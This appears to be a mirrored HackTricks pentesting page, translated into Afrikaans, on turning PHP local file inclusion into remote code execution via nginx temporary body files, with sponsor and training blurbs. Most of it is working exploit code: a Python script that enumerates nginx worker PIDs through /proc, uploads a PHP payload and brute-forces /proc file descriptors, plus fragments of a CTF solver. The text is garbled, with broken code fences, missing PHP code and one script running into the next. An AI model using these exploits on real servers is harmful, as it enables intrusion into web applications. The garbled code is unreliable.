Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-29 08:01:00 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md

8.5 KiB
Raw Blame History

LFI2RCE via Nginx temp files

{% hint style="success" %} Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks
{% endhint %}

WhiteIntel

WhiteIntel is 'n dark-web aangedrewe soekenjin wat gratis funksies bied om te kyk of 'n maatskappy of sy kliënte gekompromitteer is deur stealer malwares.

Hul primêre doel van WhiteIntel is om rekening oorname en ransomware-aanvalle te bekamp wat voortspruit uit inligting-steel malware.

Jy kan hul webwerf besoek en hul enjin gratis probeer by:

{% embed url="https://whiteintel.io" %}

Kwetsbare konfigurasie

Voorbeeld van https://bierbaumer.net/security/php-lfi-with-nginx-assistance/

  • PHP kode:

````h`

/dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon_inode:[eventfd] lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:[27587] lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:[27589] lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:[44926] lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927] lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (verwyder) ... ``` Let wel: 'n Mens kan nie direk `/proc/34/fd/15` in hierdie voorbeeld insluit nie, aangesien PHP se `include` funksie die pad na `/var/lib/nginx/body/0000001368 (verwyder)` sou oplos wat nie in die lêerstelsel bestaan nie. Hierdie klein beperking kan gelukkig oorgeskrywe word deur 'n paar indireksie soos: `/proc/self/fd/34/../../../34/fd/15` wat uiteindelik die inhoud van die verwyderde `/var/lib/nginx/body/0000001368` lêer sal uitvoer. ## Volledige Exploit ```python #!/usr/bin/env python3 import sys, threading, requests # exploiteer PHP plaaslike lêerinclusie (LFI) via nginx se kliënt liggaam buffering hulp # sien https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ vir besonderhede URL = f'http://{sys.argv[1]}:{sys.argv[2]}/' # vind nginx werker prosesse r = requests.get(URL, params={ 'file': '/proc/cpuinfo' }) cpus = r.text.count('processor') r = requests.get(URL, params={ 'file': '/proc/sys/kernel/pid_max' }) pid_max = int(r.text) print(f'[*] cpus: {cpus}; pid_max: {pid_max}') nginx_workers = [] for pid in range(pid_max): r = requests.get(URL, params={ 'file': f'/proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'[*] nginx werker gevind: {pid}') nginx_workers.append(pid) if len(nginx_workers) >= cpus: break done = False # laai 'n groot kliënt liggaam op om nginx te dwing om 'n /var/lib/nginx/body/$X te skep def uploader(): print('[+] uploader begin') while not done: requests.get(URL, data=' //'

requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
except:
pass

def send\_payload\_worker(requests\_session): while True: send\_payload(requests\_session)

def send\_payload\_multiprocess(requests\_session): # Gebruik alle CPU's om die payload as aanvraagliggaam vir Nginx te stuur vir \_ in range(multiprocessing.cpu\_count()): p = multiprocessing.Process(target=send\_payload\_worker, args=(requests\_session,)) p.start()

def generate\_random\_path\_prefix(nginx\_pids): # Hierdie metode skep 'n pad uit 'n willekeurige aantal ProcFS padkomponente. 'n Gekreëerde pad sal soos volg lyk /proc/\<nginx pid 1>/cwd/proc/\<nginx pid 2>/root/proc/\<nginx pid 3>/root pad = "" component\_num = random.randint(0, 10) for \_ in range(component\_num): pid = random.choice(nginx\_pids) if random.randint(0, 1) == 0: pad += f"/proc/{pid}/cwd" else: pad += f"/proc/{pid}/root" return pad

def read\_file(requests\_session, nginx\_pid, fd, nginx\_pids): nginx\_pid\_list = list(nginx\_pids) while True: pad = generate\_random\_path\_prefix(nginx\_pid\_list) pad += f"/proc/{nginx\_pid}/fd/{fd}" try: d = requests\_session.get(SERVER + f"/?action=include\&file={pad}").text except: continue # Vlaggies is geformateer as hxp{} if "hxp" in d: print("Vlag gevind! ") print(d)

def read\_file\_worker(requests\_session, nginx\_pid, nginx\_pids): # Skandeer Nginx FD's tussen 10 - 45 in 'n lus. Aangesien lêers en sokke aanhou sluit - dit is baie algemeen dat die aanvraagliggaam FD binne hierdie reeks oopmaak vir fd in range(10, 45): thread = threading.Thread(target = read\_file, args = (requests\_session, nginx\_pid, fd, nginx\_pids)) thread.start()

def read\_file\_multiprocess(requests\_session, nginx\_pids): for nginx\_pid in nginx\_pids: p = multiprocessing.Process(target=read\_file\_worker, args=(requests\_session, nginx\_pid, nginx\_pids)) p.start()

if **name** == "**main**": print('\[DEBUG] Skep aanvraag sessie') requests\_session = create\_requests\_session() print('\[DEBUG] Kry Nginx pids') nginx\_pids = get\_nginx\_pids(requests\_session) print(f'\[DEBUG] Nginx pids: {nginx\_pids}') print('\[DEBUG] Begin payload stuur') send\_payload\_multiprocess(requests\_session) print('\[DEBUG] Begin fd lesers') read\_file\_multiprocess(requests\_session, nginx\_pids)


## Labs

* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz)
* [https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/](https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/)
* [https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/](https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/)

## References

* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)

### [WhiteIntel](https://whiteintel.io)

<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>

[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.

Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.

You can check their website and try their engine for **free** at:

<div data-gb-custom-block data-tag="embed" data-url='https://whiteintel.io'></div>

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}